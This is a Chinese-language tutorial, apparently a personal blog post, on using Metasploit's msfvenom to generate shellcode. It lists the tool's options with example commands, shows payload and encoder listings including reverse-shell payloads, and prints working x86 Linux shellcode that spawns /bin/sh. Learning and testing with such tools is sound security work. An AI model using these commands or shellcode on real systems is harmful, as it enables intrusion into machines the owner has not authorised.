metasploit-shellcode生成

0x00 安裝metasploit

$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
$ chmod 755 msfinstall
$ ./msfinstall

0x01 參數介紹

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
        --help-platforms             List available platforms
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

1. -p 指定payload的功能

  --payload:確定payload類型

  --payload-options:查看對應payload類型子選項

例：
 msfvenom -p linux/x86/exec CMD=/bin/sh   執行shell

2. -a 指定處理器架構和操作平台

--arch：指定處理器架構

--platform：指定平台

例：

msfvenom -a x86 --platform linux

3. -f 指定輸出格式

例：
msfvenom -a x86 --platform linux -f python payload以python語言格式輸出

4. -b 指定規避字符串（以字符的16進制表示）

例：
msfvenom -a x86 --platform linux -b "\x00\x0a"  生成的payload中不允許出現'\x00'和'\x0a'

5. -e 指定編碼器

例：
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -e x86/alpha_mixed 

6. -n 在payload前填充Nop Sled

--nopsled:指定rop類型
 <length>：指定rop長度
例：
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -n x86/single_byte 120

7. -l 列出msf中payload類型，編碼器類型，NOP類型

msfvenom -l

Framework Payloads (486 total)
==============================

Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
android/meterpreter/reverse_http Run a meterpreter server in Android. Tunnel communication over HTTP
android/meterpreter/reverse_https Run a meterpreter server in Android. Tunnel communication over HTTPS
android/meterpreter/reverse_tcp Run a meterpreter server in Android. Connect back stager

......

Framework Encoders
==================

Name Rank Description
---- ---- -----------
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
generic/none normal The "none" Encoder
mipsbe/byte_xori normal Byte XORi Encoder

......

Framework NOPs (9 total)
========================

Name Description
---- -----------
armle/simple Simple NOP generator
mipsbe/better Better NOP generator
php/generic Generates harmless padding for PHP scripts
ppc/simple Simple NOP generator
sparc/random SPARC NOP generator
tty/generic Generates harmless padding for TTY input
x64/simple An x64 single/multi byte NOP instruction generator.
x86/opty2 Opty2 multi-byte NOP generator
x86/single_byte Single-byte NOP generator

8. -v 指定payload名字

payload默認叫buf
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -f python

  No encoder or badchars specified, outputting raw payload
  Payload size: 38 bytes
  Final size of python file: 192 bytes
  buf = ""
  buf += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f"
  buf += "\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x03"
  buf += "\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1\xcd\x80"

例：
msfvenom -a x86 --platform linux -p linux/x86/exec CMD="sh" -v payload -f python

  No encoder or badchars specified, outputting raw payload
  Payload size: 38 bytes
  Final size of python file: 222 bytes
  payload = ""
  payload += "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68"
  payload += "\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52"
  payload += "\xe8\x03\x00\x00\x00\x73\x68\x00\x57\x53\x89\xe1"
  payload += "\xcd\x80"

9. 其他參數我沒有深究

0x02 參考

Shellcode生成器——msfvenom

生成自己的Alphanumeric/Printable shellcode

工具總歸是工具，自己還是要會寫，fighting！！　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　。